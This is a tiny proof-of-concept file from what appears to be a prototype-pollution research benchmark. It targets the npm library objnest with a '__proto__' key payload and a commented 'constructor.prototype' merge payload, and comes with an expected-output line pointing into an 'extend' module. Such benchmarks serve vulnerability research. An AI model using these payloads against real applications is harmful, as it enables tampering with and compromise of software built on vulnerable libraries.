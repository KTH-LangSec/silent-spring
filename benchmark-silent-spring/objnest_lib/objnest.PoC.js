//https://github.com/okunishinishi/node-objnest/pull/6
const objnest = require("objnest");

objnest.expand({ "__proto__.polluted": "yes" });

// objnest._merge({}, JSON.parse('{ "constructor": {"prototype": {"polluted": "yes" }}}'))
// console.log({}.polluted)