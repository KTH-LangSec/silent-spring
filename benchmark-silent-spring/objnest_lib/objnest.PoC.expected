node_modules/extend/index.js:46:24